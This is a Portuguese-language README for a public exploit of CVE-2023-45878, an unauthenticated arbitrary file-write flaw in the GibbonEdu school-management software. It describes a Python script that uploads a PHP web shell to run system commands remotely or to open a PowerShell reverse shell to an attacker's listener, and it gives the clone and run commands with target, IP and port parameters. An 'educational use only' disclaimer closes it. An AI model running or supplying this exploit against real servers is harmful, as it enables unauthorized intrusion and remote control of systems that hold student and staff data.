
GibbonEdu Escrita Arbitrária de Arquivos para Execução Remota de Código
GibbonEdu Gravação Arbitrária de Arquivos para Execução de Web Shell
Este repositório contém um exploit para a CVE-2023-45878, uma vulnerabilidade de gravação arbitrária de arquivos no GibbonEdu. A vulnerabilidade afeta o endpoint rubrics_visualise_saveAjax.php e permite que um atacante não autenticado envie arquivos arbitrários para o servidor web.
Este script aproveita a vulnerabilidade para enviar um web shell em PHP e pode:
O script suporta dois modos de operação:
--command (-c): Executa um comando específico do sistema remotamente.--shell (-s): Aciona um reverse shell do PowerShell para o listener do atacante.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
Este script destina-se apenas a fins educacionais. O uso não autorizado deste exploit em sistemas sem permissão é ilegal. O autor não é responsável por qualquer uso indevido ou danos causados por este exploit.